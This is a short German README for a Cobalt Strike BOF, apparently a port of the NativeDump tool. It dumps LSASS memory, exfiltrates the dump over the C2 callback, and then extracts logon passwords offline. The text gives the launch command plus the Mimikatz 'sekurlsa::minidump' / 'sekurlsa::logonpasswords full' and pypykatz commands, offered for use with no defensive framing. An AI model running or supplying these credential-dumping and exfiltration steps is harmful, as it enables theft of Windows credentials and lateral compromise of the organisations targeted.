
Cobalt Strike BOF, das ein LSASS-Minidump im Speicher erstellt und es über den C2-Callback exfiltriert, um Anmeldedaten offline mit Mimikatz oder pypykatz zu analysieren.
BOF-Portierung des Tools https://github.com/ricardojoserf/NativeDump, geschrieben von @ricardojoserf.
Importiere NtDump.cna und führe aus:
ntdump <filename>
Die Minidump-Datei wird im Speicher erstellt und mithilfe von CALLBACK_FILE und CALLBACK_FILE_WRITE heruntergeladen. Nach dem Herunterladen ist die Datei unter View -> Download sichtbar.
Dies kann anschließend mit Mimikatz analysiert werden
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
Oder mit pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>